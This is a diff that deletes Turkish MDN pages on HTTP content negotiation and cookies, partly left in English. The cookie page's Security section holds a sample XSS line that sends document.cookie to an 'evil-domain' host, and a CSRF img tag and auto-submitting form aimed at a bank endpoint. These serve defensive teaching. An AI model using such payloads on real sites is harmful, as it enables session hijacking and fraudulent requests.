Diffstat (limited to 'files/tr/web/http')
26 files changed, 0 insertions, 2867 deletions
diff --git a/files/tr/web/http/content_negotiation/index.html b/files/tr/web/http/content_negotiation/index.html deleted file mode 100644 index 9a12e443a3..0000000000 --- a/files/tr/web/http/content_negotiation/index.html +++ /dev/null 
@@ -1,141 +0,0 @@ ---- -title: İçerik görüşmesi -slug: Web/HTTP/Content_negotiation -translation_of: Web/HTTP/Content_negotiation ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><a href="/tr/docs/Glossary/HTTP">HTTP</a> protokolünde, <em><strong>içerik görüşmesi</strong></em> bir kaynağın aynı URI'de farklı biçimlerini sunmak için kullanılan mekanizmadır, bu mekanizma sayesinde kullanıcının programı onun için bunların hangisinin daha uygun olacağını belirleyebilir (örneğin, bir dosyanın hangi dilinin, hangi resim formatının, ya da hangi içerik kodlamasının seçileceği gibi).</p> - -<h2 id="İçerik_görüşmesi_prensipleri">İçerik görüşmesi prensipleri</h2> - -<p>Belirli bir dosyaya <em>kaynak </em>denir. Bir istemci bu kaynağı elde etmek istediğinde, onun URL'sini kullanarak istekte bulunur. Sunucu bu URL'yi kullanarak bir varyantı seçer – her bir varyanta bir <em>temsil </em>denilir – ve istemciye bu belirli temsili döndürür. Kaynağın kendisinin, ve her bir temsilinin, belirli bir URL'si vardır. 
How a specific representation is chosen when the resource is called is determined by <em>content negotiation</em> and there are several ways of negotiating between the client and the server.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13789/HTTPNego.png" style="height: 311px; width: 767px;"></p> - -<p>The determination of the best suited representation is made through one of two mechanisms:</p> - -<ul> - <li>Specific <a href="/tr/docs/Web/HTTP/Headers">HTTP headers</a> by the client (<em>server-driven negotiation</em> or <em>proactive negotiation</em>), which is the standard way of negotiating a specific kind of resource.</li> - <li>The {{HTTPStatus("300")}} (Multiple Choices) or {{HTTPStatus("406")}} (Not Acceptable) <a href="/tr/docs/Web/HTTP/Status">HTTP response codes</a> by the server (<em>agent-driven negotiation</em> or <em>reactive negotiation</em>), that are used as fallback mechanisms.</li> -</ul> - -<p>Over the years, other content negotiation proposals, like <em>transparent content negotiation</em> and the <code>Alternates</code> header, have been proposed. They failed to get traction and got abandoned.</p> - -<h2 id="Server-driven_content_negotiation">Server-driven content negotiation</h2> - -<p>In <em>server-driven content negotiation</em>, or proactive content negotiation, the browser (or any other kind of user-agent) sends several HTTP headers along with the URL. These headers describe the preferred choice of the user. The server uses them as hints and an internal algorithm chooses the best content to serve to the client. The algorithm is server-specific and not defined in the standard. 
See, for example, the <a class="external" href="http://httpd.apache.org/docs/2.2/en/content-negotiation.html#algorithm">Apache 2.2 negotiation algorithm</a>.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13791/HTTPNegoServer.png" style="height: 380px; width: 767px;"></p> - -<p>The HTTP/1.1 standard defines list of the standard headers that start server-driven negotiation ({{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Language")}}). Though strictly speaking {{HTTPHeader("User-Agent")}} is not in this list, it is sometimes also used to send a specific representation of the requested resource, though this is not considered as a good practice. The server uses the {{HTTPHeader("Vary")}} header to indicate which headers it actually used for content negotiation (or more precisely the associated response headers), so that <a href="/en-US/docs/Web/HTTP/Caching">caches</a> can work optimally.</p> - -<p>In addition to these, there is an experimental proposal to add more headers to the list of available headers, called <em>client hints</em>. Client hints advertise what kind of device the user agent runs on (for example, if it is a desktop computer or a mobile device).</p> - -<p>Even if server-driven content negotiation is the most common way to agree on a specific representation of a resource, it has several drawbacks:</p> - -<ul> - <li>The server doesn't have total knowledge of the browser. Even with the Client Hints extension, it has not a complete knowledge of the capabilities of the browser. 
Unlike reactive content negotiation where the client makes the choice, the server choice is always somewhat arbitrary.</li> - <li>The information by the client is quite verbose (HTTP/2 header compression mitigates this problem) and a privacy risk (HTTP fingerprinting)</li> - <li>As several representations of a given resource are sent, shared caches are less efficient and server implementations are more complex.</li> -</ul> - -<h3 id="The_Accept_header">The <code>Accept</code> header</h3> - -<p>The {{HTTPHeader("Accept")}} header lists the MIME types of media resources that the agent is willing to process. It is comma-separated lists of MIME types, each combined with a quality factor, a parameter indicating the relative degree of preference between the different MIME types.</p> - -<p>The {{HTTPHeader("Accept")}} header is defined by the browser, or any other user-agent, and can vary according to the context, like fetching an HTML page or an image, a video, or a script: It is different when fetching a document entered in the address bar or an element linked via an {{ HTMLElement("img") }}, {{ HTMLElement("video") }} or {{ HTMLElement("audio") }} element. Browsers are free to use the value of the header that they think is the most adequate; an exhaustive list of <a href="/en-US/docs/Web/HTTP/Content_negotiation/List_of_default_Accept_values">default values for common browsers</a> is available.</p> - -<h3 id="The_Accept-CH_header_experimental_inline">The <code>Accept-CH</code> header {{experimental_inline}}</h3> - -<div class="note"> -<p>This is part of an <strong>experimental</strong> technology called <em>Client Hints</em>. Initial support is in Chrome 46 or later. The Device-Memory value is in Chrome 61 or later.</p> -</div> - -<p>The experimental {{HTTPHeader("Accept-CH")}} lists configuration data that can be used by the server to select an appropriate response. 
Valid values are:</p> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Value</th> - <th scope="col">Meaning</th> - </tr> - </thead> - <tbody> - <tr> - <td><code>Device-Memory</code></td> - <td>Indicates the approximate amount of device RAM. This value is an approximation given by rounding to the nearest power of 2 and dividing that number by 1024. For example, 512 megabytes will be reported as <code>0.5</code>. </td> - </tr> - <tr> - <td><code>DPR</code></td> - <td>Indicates the client's device pixel ratio.</td> - </tr> - <tr> - <td><code>Viewport-Width</code></td> - <td>Indicates the layout viewport width in CSS pixels. </td> - </tr> - <tr> - <td><code>Width</code></td> - <td>Indicates the resource width in physical pixels (in other words the intrinsic size of an image).</td> - </tr> - </tbody> -</table> - -<h3 id="The_Accept-Charset_header">The <code>Accept-Charset</code> header</h3> - -<p>The {{HTTPHeader("Accept-Charset")}} header indicates to the server what kinds of character encodings are understood by the user-agent. 
Traditionally, it was set to a different value for each locale for the browser, like <code>ISO-8859-1,utf-8;q=0.7,*;q=0.7</code> for a Western European locale.</p> - -<p>With UTF-8 now being well-supported, being the preferred way of encoding characters, <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">and to guarantee better privacy through less configuration-based entropy</a>, browsers omit the <code>Accept-Charset</code> header: Internet Explorer 8, Safari 5, Opera 11, Firefox 10 and Chrome 27 have abandoned this header.</p> - -<h3 id="The_Accept-CH-Lifetime_header">The <code>Accept-CH-Lifetime</code> header</h3> - -<div class="note"> -<p>This is part of an <strong>experimental</strong> technology called <em>Client Hints </em> and is only available in Chrome 61 or later.</p> -</div> - -<p>The {{HTTPHeader("Accept-CH-Lifetime")}} header is used with the <code>Device-Memory</code> value of the <code>Accept-CH</code> header and indicates the amount of time the device should opt-in to sharing the amount of device memory with the server. The value is given in miliseconds and it's use is optional.</p> - -<h3 id="The_Accept-Encoding_header">The <code>Accept-Encoding</code> header</h3> - -<p>The {{HTTPHeader("Accept-Encoding")}} header defines the acceptable content-encoding (supported compressions). The value is a q-factor list (e.g.: <code>br, gzip;q=0.8</code>) that indicates the priority of the encoding values. 
The default value <code>identity</code> is at the lowest priority (unless otherwise declared).</p> - -<p>Compressing HTTP messages is one of the most important ways to improve the performance of a Web site, it shrinks the size of the data transmitted and makes better use of the available bandwidth; browsers always send this header and the server should be configured to abide to it and to use compression.</p> - -<h3 id="The_Accept-Language_header">The <code>Accept-Language</code> header</h3> - -<p>The {{HTTPHeader("Accept-Language")}} header is used to indicate the language preference of the user. It is a list of values with quality factors (like: <code>"de, en;q=0.7</code>"). A default value is often set according the language of the graphical interface of the user agent, but most browsers allow to set different language preferences.</p> - -<p>Due to the <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">configuration-based entropy</a> increase, a modified value can be used to fingerprint the user, it is not recommended to change it and a Web site cannot trust this value to reflect the actual wish of the user. Site designers must not be over-zealous by using language detection via this header as it can lead to a poor user experience:</p> - -<ul> - <li>They should always provide a way to overcome the server-chosen language, e.g., by providing a language menu on the site. Most user-agents provide a default value for the <code>Accept-Language</code> header, adapted to the user interface language and end users often do not modify it, either by not knowing how, or by not being able to do it, as in an Internet café for instance.</li> - <li>Once a user has overridden the server-chosen language, a site should no longer use language detection and should stick with the explicitly-chosen language. 
In other words, only entry pages of a site should select the proper language using this header.</li> -</ul> - -<h3 id="The_User-Agent_header">The <code>User-Agent</code> header</h3> - -<div class="note"> -<p>Though there are legitimate uses of this header for selecting content, <a href="/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent">it is considered bad practice</a> to rely on it to define what features are supported by the user agent.</p> -</div> - -<p>The {{HTTPHeader("User-Agent")}} header identifies the browser sending the request. This string may contain a space-separated list of <em>product tokens</em> and <em>comments</em>.</p> - -<p>A <em>product token</em> is a name followed by a '<code>/</code>' and a version number, like <code>Firefox/4.0.1</code>. There may be as many of them as the user-agent wants. A <em>comment</em> is a free string delimited by parentheses. Obviously parentheses cannot be used in that string. The inner format of a comment is not defined by the standard, though several browser put several tokens in it, separated by '<code>;</code>'.</p> - -<h3 id="The_Vary_response_header">The <code>Vary</code> response header</h3> - -<p>In opposition to the previous <code>Accept-*</code> headers which are sent by the client, the {{HTTPHeader("Vary")}} HTTP header is sent by the web server in its response. It indicates the list of headers used by the server during the server-driven content negotiation phase. The header is needed in order to inform the cache of the decision criteria so that it can reproduce it, allowing the cache to be functional while preventing serving erroneous content to the user.</p> - -<p>The special value of '<code>*</code>' means that the server-driven content negotiation also uses information not conveyed in a header to choose the appropriate content.</p> - -<p>The <code>Vary</code> header was added in the version 1.1 of HTTP and is necessary in order to allow caches to work appropriately. 
A cache, in order to work with server-driven content negotiation, needs to know which criteria was used by the server to select the transmitted content. That way, the cache can replay the algorithm and will be able to serve acceptable content directly, without more request to the server. Obviously, the wildcard '<code>*</code>' prevents caching from occurring, as the cache cannot know what element is behind it.</p> - -<h2 id="Agent-driven_negotiation">Agent-driven negotiation</h2> - -<p>Server-driven negotiation suffers from a few downsides: it doesn't scale well. There is one header per feature used in the negotiation. If you want to use screen size, resolution or other dimensions, a new HTTP header must be created. Sending of the headers must be done on every request. This is not too problematic with few headers, but with the eventual multiplications of them, the message size would lead to a decrease in performance. The more precise headers are sent, the more entropy is sent, allowing for more HTTP fingerprinting and corresponding privacy concern.</p> - -<p>From the beginnings of HTTP, the protocol allowed another negotiation type: <em>agent-driven negotiation</em> or <em>reactive negotiation</em>. In this negotiation, when facing an ambiguous request, the server sends back a page containing links to the available alternative resources. The user is presented the resources and choose the one to use.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/13795/HTTPNego3.png"></p> - -<p>Unfortunately, the HTTP standard does not specify the format of the page allowing to choose between the available resource, which prevents to easily automatize the process. Besides falling back to the <em>server-driven negotiation</em>, this method is almost always used in conjunction with scripting, especially with JavaScript redirection: after having checked for the negotiation criteria, the script performs the redirection. 
A second problem is that one more request is needed in order to fetch the real resource, slowing the availability of the resource to the user.</p> diff --git a/files/tr/web/http/cookies/index.html b/files/tr/web/http/cookies/index.html deleted file mode 100644 index b815de758d..0000000000 --- a/files/tr/web/http/cookies/index.html +++ /dev/null 
@@ -1,251 +0,0 @@ ---- -title: HTTP çerezleri -slug: Web/HTTP/Cookies -tags: - - HTTP - - Sunucu - - Tarayıcı - - Çerezler -translation_of: Web/HTTP/Cookies ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><span class="seoSummary"><dfn>HTTP çerezi</dfn> (web çerezi, tarayıcı çerezi), bir sunucunun kullanıcının web tarayıcısına gönderdiği küçük bir veri parçasıdır. Tarayıcı bunu saklayabilir ve bir sonraki istekle aynı sunucuya geri gönderebilir.</span> <span class="tlid-translation translation" lang="tr">Genellikle, iki ayrı isteğin aynı tarayıcıdan gelip gelmediğini anlamak için kullanılır - örneğin bir kullanıcının giriş yapmış olarak kalması gibi. HTTP protokolü durumsuz (</span><a href="/en-US/docs/Web/HTTP/Overview#HTTP_is_stateless_but_not_sessionless">stateless</a><span class="tlid-translation translation" lang="tr">) olduğu için çerez durum bilgisini hatırlar.</span></p> - -<p>Çerezler temel olarak üç amaç için kullanılır:</p> - -<dl> - <dt>Oturum yönetimi</dt> - <dd><span class="tlid-translation translation" lang="tr">Girişler, alışveriş sepetleri, oyun puanları veya sunucunun hatırlaması gereken diğer şeyler</span></dd> - <dt><span class="tlid-translation translation" lang="tr">Kişiselleştirme</span></dt> - <dd><span class="tlid-translation translation" lang="tr">Kullanıcı tercihleri, temalar ve diğer ayarlar</span></dd> - <dt><span class="tlid-translation translation" lang="tr">Takip etme</span></dt> - <dd><span class="tlid-translation translation" lang="tr">Kullanıcı davranışını kaydetme ve analiz etme</span></dd> -</dl> - -<p><span class="tlid-translation translation" lang="tr">Çerezler eskiden genel istemci tarafında depolama amaçlı kullanılmıştır. O zamanlar istemcide veri depolamanın tek yolu bu olduğundan çerez kullanımı mantıklı idi; ancak günümüzde modern depolama API'lerini tercih etmeleri önerilir. Çerezler her istekle birlikte gönderilir, bu yüzden performansı düşürebilirler (özellikle mobil veri bağlantıları için). 
İstemci depolaması için kullanılan modern API'ler </span><a href="/en-US/docs/Web/API/Web_Storage_API" title="DOM Storage">Web storage API</a> (<code>localStorage</code> ve <code>sessionStorage</code>) ve <a href="/en-US/docs/Web/API/IndexedDB_API">IndexedDB</a><span class="tlid-translation translation" lang="tr">'dir.</span></p> - -<div class="note"> -<p><span class="tlid-translation translation" lang="tr">Depolanmış çerezleri (ve bir web sayfasının kullanabileceği diğer depoları) görmek için, Geliştirici Araçları'nda Depolama Denetçisi'ni (</span><a href="/en-US/docs/Tools/Storage_Inspector">Storage Inspector</a><span class="tlid-translation translation" lang="tr">) etkinleştirebilir ve depolama ağacından Çerezler'i seçebilirsiniz.</span></p> -</div> - -<h2 id="Çerez_oluşturma"><span class="tlid-translation translation" lang="tr">Çerez oluşturma</span></h2> - -<p><span class="tlid-translation translation" lang="tr">Bir HTTP isteği aldığında, sunucu yanıtla beraber bir {{HTTPHeader ("Set-Cookie")}} başlığı gönderebilir. Bu çerez genellikle tarayıcı tarafından depolanır ve daha sonra aynı sunucuya yapılan isteklerde {{HTTPHeader ("Cookie")}} HTTP başlığı içinde gönderilir. Son kullanma tarihi veya kullanım süresi tanımlanabilir, bu süre bitiminde artık çerez gönderilmez. Buna ilaveten, çerezin gönderildiği yeri sınırlayacak belirli bir alan(domain) ve yol(path) için kısıtlamalar konulabilir.</span></p> - -<h3 id="Set-Cookie_ve_Cookie_başlıkları"><code>Set-Cookie</code> ve <code>Cookie</code> başlıkları</h3> - -<p>The {{HTTPHeader("Set-Cookie")}} HTTP yanıt başlığı,<span class="tlid-translation translation" lang="tr"> sunucudan kullanıcı programa çerezleri gönderir. 
Basit bir çerez şöyle ayarlanır:</span> :</p> - -<pre class="syntaxbox">Set-Cookie: <cookie-adı>=<cookie-değeri></pre> - -<p><span class="tlid-translation translation" lang="tr">Sunucudan gelen bu başlık istemciye bir çerezi kaydetmesini söyler.</span></p> - -<div class="note"><strong>Not:</strong> <code>Set-Cookie</code><span class="tlid-translation translation" lang="tr"> başlığı çeşitli sunucu tarafı uygulamalarda şöyle kullanılır</span>: - -<ul> - <li><a href="https://secure.php.net/manual/en/function.setcookie.php">PHP</a></li> - <li><a href="https://nodejs.org/dist/latest-v8.x/docs/api/http.html#http_response_setheader_name_value">Node.JS</a></li> - <li><a href="https://docs.python.org/3/library/http.cookies.html">Python</a></li> - <li><a href="https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html">Ruby on Rails</a></li> -</ul> -</div> - -<pre>HTTP/2.0 200 OK -Content-type: text/html -Set-Cookie: skor=75 -Set-Cookie: tema=dark - -[page content]</pre> - -<p id="The_client_sends_back_to_the_server_its_cookies_previously_stored"><span class="tlid-translation translation" lang="tr">Artık tarayıcı sunucuya yaptığı her yeni istekte daha önce kaydetmiş olduğu tüm çerezleri {{HTTPHeader ("Cookie")}} başlığını kullanarak geri gönderir.</span></p> - -<pre>GET /sample_page.html HTTP/2.0 -Host: www.example.org -Cookie: skor=75; tema=dark</pre> - -<h3 id="Oturum_çerezleri">Oturum çerezleri</h3> - -<p><span class="tlid-translation translation" lang="tr">Yukarıda oluşturulan çerez bir <em>oturum çerezidir</em>: istemci kapandığında silinir, çünkü bir </span><code>Expires</code> veya <code>Max-Age</code><span class="tlid-translation translation" lang="tr"> direktifi belirtmemiştir. 
Ancak web tarayıcıları <strong>oturum canlandırma (</strong></span><strong>session restoring</strong><span class="tlid-translation translation" lang="tr"><strong>)</strong> özelliğini kullanarak çoğu oturum çerezini sanki tarayıcı hiç kapatılmamış gibi kalıcı yapabilirler.</span></p> - -<h3 id="Kalıcı_çerezler">Kalıcı çerezler</h3> - -<p><em>K</em><span class="tlid-translation translation" lang="tr"><em>alıcı çerezler</em>, </span>istemci <span class="tlid-translation translation" lang="tr">kapandığında zaman aşımına uğramak yerine, belirli bir tarihte </span>(<code>Expires</code>)<span class="tlid-translation translation" lang="tr"> veya belirli bir süre sonra </span>(<code>Max-Age</code>)<span class="tlid-translation translation" lang="tr"> kullanımdan kalkar.</span></p> - -<pre>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;</pre> - -<div class="note"> -<p><strong>Not</strong>: <span class="tlid-translation translation" lang="tr">Son kullanma tarihi belirtildiğinde, saat ve tarih sunucuya göre değil, çerezi tanımlayan istemciye göre ayarlanır.</span></p> -</div> - -<h3 id="Secure_ve_HttpOnly_çerezleri"><code>Secure</code> ve <code>HttpOnly</code> çerezleri</h3> - -<p><span class="tlid-translation translation" lang="tr">Güvenli bir çerez, sunucuya yalnızca HTTPS protokolü üzerinden şifrelenmiş bir istekle gönderilebilir. </span><code>Secure</code><span class="tlid-translation translation" lang="tr"> bayrağı bile olsa, hassas bilgiler <em>asla </em>çerezlerde saklanmamalıdır; çünkü çerezler doğası gereği güvenli değildir ve bu bayrak gerçek bir koruma sağlayamaz. 
Chrome 52 ve Firefox 52'den itibaren, güvensiz siteler </span>(<code>http:</code>) <code>Secure</code> direktifi <span class="tlid-translation translation" lang="tr">ile çerezleri ayarlayamamaktadır.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Siteler arası komut dosyası çalıştırma ({{Glossary ("XSS")}}) saldırılarını önlemek için, </span><code>HttpOnly</code><span class="tlid-translation translation" lang="tr"> çerezlerine JavaScript'in {{domxref ("Document.cookie")}} API'sinden erişilemez; bu çerezler sadece sunucuya gönderilir. Örneğin, sunucu tarafı oturumlarını devam ettiren çerezlerin JavaScript'ten erşilebilir olması gerekmez, ve bunlarda </span><code>HttpOnly</code> <span class="tlid-translation translation" lang="tr">bayrağı ayarlanmalıdır.</span></p> - -<pre>Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly</pre> - -<h3 id="Çerezlerin_kapsamı"><span class="tlid-translation translation" lang="tr">Çerezlerin kapsamı</span></h3> - -<p><code>Domain</code> ve <code>Path</code> direktifleri<span class="tlid-translation translation" lang="tr"> çerezin <em>kapsamını </em>yani hangi URL'lere gönderilmesi gerektiğini </span>tanımlar.</p> - -<p><code>Domain</code> <span class="tlid-translation translation" lang="tr">çerezlerin alınmasına izin verilen ana bilgisayarları(host) belirtir. Eğer belirtilmemişse varsayılan değeri <strong>alt alanlar hariç</strong> şu anki belge konumundaki ana bilgisayardır (</span><a href="/en-US/docs/Web/API/Document/location">host of the current document location</a><span class="tlid-translation translation" lang="tr">). 
Eğer </span><code>Domain</code><span class="tlid-translation translation" lang="tr"> <em>belirtilmişse</em>, alt alanlar her zaman dahil edilir.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Örneğin, </span><code>Domain=mozilla.org</code><span class="tlid-translation translation" lang="tr"> belirtilmişse, çerezler </span><code>developer.mozilla.org</code><span class="tlid-translation translation" lang="tr"> gibi alt alanlarda dahil edilir.</span></p> - -<p><code>Path</code><span class="tlid-translation translation" lang="tr">, </span><code>Cookie</code><span class="tlid-translation translation" lang="tr"> başlığını gönderebilmek için istenen URL'de bulunması gereken URL yolunu gösterir. %X2F ("/") karakteri dizin ayırıcı olarak kabul edilir ve alt dizinler de eşleşir.</span></p> - -<p><span class="tlid-translation translation" lang="tr">Örneğin, </span><code>Path=/docs</code> <span class="tlid-translation translation" lang="tr">belirtilmişse, şu yollar eşleşecektir:</span></p> - -<ul> - <li><code>/docs</code></li> - <li><code>/docs/Web/</code></li> - <li><code>/docs/Web/HTTP</code></li> -</ul> - -<h3 id="SameSite_çerezleri_experimental_inline"><code>SameSite</code> çerezleri {{experimental_inline}}</h3> - -<p><code>SameSite</code> çerezleri,<span class="tlid-translation translation" lang="tr"> sunucuların siteler arası yapılan isteklerde (buradaki </span>{{Glossary("Site")}}<span class="tlid-translation translation" lang="tr"> tescilli etki alanı tarafından tanımlıdır) çerez gönderimini engellemesini sağlar, bu da siteler arası sahtecilik saldırılarına </span>({{Glossary("CSRF")}})<span class="tlid-translation translation" lang="tr"> karşı bir miktar koruma sağlar.</span></p> - -<p><code>SameSite</code><span class="tlid-translation translation" lang="tr"> çerezleri nispeten yenidir ve <a href="/en-US/docs/Web/HTTP/headers/Set-Cookie#Browser_compatibility">tüm büyük tarayıcılar tarafından desteklenmektedir</a>.</span></p> - -<p>Örnek:</p> - 
-<pre>Set-Cookie: key=value; SameSite=Strict</pre> - -<p>SameSite<span class="tlid-translation translation" lang="tr"> özelliği şu iki değerden birini alabilir (büyük/küçük harf duyarlı değil):</span></p> - -<dl> - <dt><code>Strict</code></dt> - <dd><span class="tlid-translation translation" lang="tr">Same-site çerezi bu özelliğe sahipse, tarayıcı yalnızca istek çerezleri oluşturan web sitesinden geldiğinde çerezleri gönderir. Eğer istek şu anki konumun URL’sinden farklı bir URL’den geldiyse, </span><code>Strict</code><span class="tlid-translation translation" lang="tr"> özelliği ile etiketlenen çerezlerin hiçbiri isteğe dahil edilmez.</span></dd> - <dt><code>Lax</code></dt> - <dd>Same-site değeri <span class="tlid-translation translation" lang="tr">Lax olarak ayarlanmışsa, resim veya frame yüklemek için yapılan aramalar gibi siteler arası alt isteklerde same-site çerezleri bekletilir; ancak kullanıcı URL’ye harici bir siteden, örneğin bir bağlantıyı takip ederek gelmişse gönderilir.</span></dd> -</dl> - -<p><span class="tlid-translation translation" lang="tr">Bayrak belirtilmemişse veya tarayıcı tarafından desteklenmiyorsa, varsayılan davranış, çerezleri farklı kaynaklı istekler (cross-origin requests) de dahil her isteğe dahil etmektir.</span></p> - -<h3 id="Cookie_önekleri_experimental_inline">Cookie önekleri {{experimental_inline}}</h3> - -<p>The design of the cookie mechanism is such that a server is unable to confirm a cookie was set on a secure origin or indeed, tell <em>where</em> a cookie was originally set. Recall that a subdomain such as <code>application.example.com</code> can set a cookie that will be sent with requests to <code>example.com</code> or other sub-domains by setting the <em>Domain</em> attribute:</p> - -<pre class="syntaxbox">Set-Cookie: CSRF=e8b667; Secure; Domain=example.com</pre> - -<p>If a vulnerable application is available on a sub-domain, this mechanism can be abused in a <em>session fixation</em> attack. 
When the user visits a page on the parent domain (or another subdomain), the application may trust the existing value sent in the user's cookie. This could allow an attacker to bypass CSRF protection or hijack a session after the user logs in.</p> - -<p>Alternatively, if the parent domain does not use {{Glossary("HSTS")}} with <code>includeSubdomains</code> set, a user subject to an active MitM (perhaps connected to an open WiFi network) could be served a response with a {{HTTPHeader("Set-Cookie")}} header from a non-existent sub-domain. The end result would be much the same, with the browser storing the illegitimate cookie and sending it to all other pages under <code>example.com</code>.</p> - -<p>Session fixation should primarily be mitigated by regenerating session cookie values when the user authenticates (even if a cookie already exists) and by tieing any CSRF token to the user. As a defence in depth measure, however, it is possible to use <em>cookie prefixes</em> to assert specific facts about the cookie. Two prefixes are available:</p> - -<dl> - <dt><code>__Host-</code></dt> - <dd>If a cookie name has this prefix, it will only be accepted in a {{HTTPHeader("Set-Cookie")}} directive if it is marked <code>Secure</code>, does <em>not</em> include a <code>Domain</code> attribute and was sent from a secure origin. In this way, these cookies can be seen as "domain-locked".</dd> - <dt><code>__Secure-</code></dt> - <dd>If a cookie name has this prefix, it will only be accepted in a {{HTTPHeader("Set-Cookie")}} directive if it is marked <code>Secure</code> and was sent from a secure origin. This is weaker than the <code>__Host-</code> prefix.</dd> -</dl> - -<p>Cookies sent which are not compliant will be rejected by the browser. Note that this ensures that if a sub-domain were to create a cookie with this name, it would be either be confined to the sub-domain or ignored completely. 
As the application server will only check for a specific cookie name when determining if the user is authenticated or a CSRF token is correct, this effectively acts as a defence measure against session fixation.</p> - -<div class="note"> -<p>On the application server, the web application <em>must</em> check for the full cookie name including the prefix—user agents <em>will not</em> strip the prefix from the cookie before sending it in a request's {{HTTPHeader("Cookie")}} header.</p> -</div> - -<p>For more information about cookie prefixes and the current state of browser support, see the <a href="/en-US/docs/Web/HTTP/Headers/Set-Cookie#Cookie_prefixes">Set-Cookie section</a>.</p> - -<h3 id="JavaScript_access_using_Document.cookie">JavaScript access using <code>Document.cookie</code></h3> - -<p>New cookies can also be created via JavaScript using the {{domxref("Document.cookie")}} property, and if the <code>HttpOnly</code> flag is not set, existing cookies can be accessed from JavaScript as well.</p> - -<pre class="brush: js">document.cookie = "yummy_cookie=choco"; -document.cookie = "tasty_cookie=strawberry"; -console.log(document.cookie); -// logs "yummy_cookie=choco; tasty_cookie=strawberry"</pre> - -<p>Cookies created via JavaScript cannot include the <code>HttpOnly</code> flag.</p> - -<p>Please note the security issues in the <a href="/en-US/docs/Web/HTTP/Cookies#Security">Security</a> section below. Cookies available to JavaScript can be stolen through XSS.</p> - -<h2 id="Security">Security</h2> - -<div class="note"> -<p>Information should be stored in cookies with the understanding that all cookie values will be visible to and can be changed by the end-user. 
Depending on the application, it may be desirable to use an opaque identifier which is looked-up server-side or investigate alternative authentication/confidentiality mechanisms such as JSON Web Tokens.</p> -</div> - -<h3 id="Session_hijacking_and_XSS">Session hijacking and XSS</h3> - -<p>Cookies are often used in web application to identify a user and their authenticated session, so stealing a cookie can lead to hijacking the authenticated user's session. Common ways to steal cookies include Social Engineering or exploiting an {{Glossary("XSS")}} vulnerability in the application.</p> - -<pre class="brush: js">(new Image()).src = "http://www.evil-domain.com/steal-cookie?cookie=" + document.cookie;</pre> - -<p>The <code>HttpOnly</code> cookie attribute can help to mitigate this attack by preventing access to cookie value through JavaScript. Exfiltration avenues can be limited by deploying a strict <a href="/en-US/docs/Web/HTTP/CSP">Content-Security-Policy</a>.</p> - -<h3 id="Cross-site_request_forgery_(CSRF)">Cross-site request forgery (CSRF)</h3> - -<p><a href="https://en.wikipedia.org/wiki/HTTP_cookie#Cross-site_request_forgery">Wikipedia</a> mentions a good example for {{Glossary("CSRF")}}. In this situation, someone includes an image that isn’t really an image (for example in an unfiltered chat or forum), instead it really is a request to your bank’s server to withdraw money:</p> - -<pre class="brush: html"><img src="https://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory"></pre> - -<p>Now, if you are logged into your bank account and your cookies are still valid (and there is no other validation), you will transfer money as soon as you load the HTML that contains this image. 
For endpoints that require a POST request, it's possible to programmatically trigger a <code><form></code> submit (perhaps in an invisible <code><iframe></code>) when the page is loaded:</p> - -<pre class="brush: html"><form action="https://bank.example.com/withdraw" method="POST"> - <input type="hidden" name="account" value="bob"> - <input type="hidden" name="amount" value="1000000"> - <input type="hidden" name="for" value="mallory"> -</form> -<script>window.addEventListener('DOMContentLoaded', (e) => { document.querySelector('form').submit(); }</script> -</pre> - -<p>There are a few techniques that should be used to prevent this from happening:</p> - -<ul> - <li>GET endpoints should be idempotent—actions that enact a <em>change </em>and do not simply retrieve data should require sending a POST (or other HTTP method) request. POST endpoints should not interchangeably accept GET requests with parameters in the query string.</li> - <li>A CSRF token should be included in <code><form></code> elements via a hidden input field. This token should be unique per user and stored (for example, in a cookie) such that the server can look up the expected value when the request is sent. For all non-GET requests that have the potential to perform an action, this input field should be compared against the expected value. If there is a mismatch, the request should be aborted. - <ul> - <li>This method of protection relies on an attacker being unable to predict the user's assigned CSRF token. The token should be regenerated on sign-in.</li> - </ul> - </li> - <li>Cookies that are used for sensitive actions (such as session cookies) should have a short lifetime with the SameSite attribute set to <code>Strict</code> or <code>Lax</code>. (See <a href="/en-US/docs/Web/HTTP/Cookies#SameSite_cookies">SameSite cookies</a> above). 
In supporting browsers, this will have the effect of ensuring that the session cookie is <em>not</em> sent along with cross-site requests and so the request is effectively unauthenticated to the application server.</li> - <li>Both CSRF tokens and SameSite cookies should be deployed. This ensures all browsers are protected and provides protection where SameSite cookies cannot help (such as attacks originating from a separate subdomain).</li> - <li>For more prevention tips, see the <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet">OWASP CSRF prevention cheat sheet</a>.</li> -</ul> - -<h2 id="Tracking_and_privacy">Tracking and privacy</h2> - -<h3 id="Third-party_cookies">Third-party cookies</h3> - -<p>Cookies have a domain associated to them. If this domain is the same as the domain of the page you are on, the cookies is said to be a <em>first-party cookie</em>. If the domain is different, it is said to be a <em>third-party cookie</em>. While first-party cookies are sent only to the server setting them, a web page may contain images or other components stored on servers in other domains (like ad banners). Cookies that are sent through these third-party components are called third-party cookies and are mainly used for advertising and tracking across the web. See for example the <a href="https://www.google.com/policies/technologies/types/">types of cookies used by Google</a>. Most browsers allow third-party cookies by default, but there are add-ons available to block them (for example, <a href="https://addons.mozilla.org/en-US/firefox/addon/privacy-badger-firefox/">Privacy Badger</a> by the <a href="https://www.eff.org/">EFF</a>).</p> - -<p>If you are not disclosing third-party cookies, consumer trust might get harmed if cookie use is discovered. A clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of a cookie discovery. Some countries also have legislation 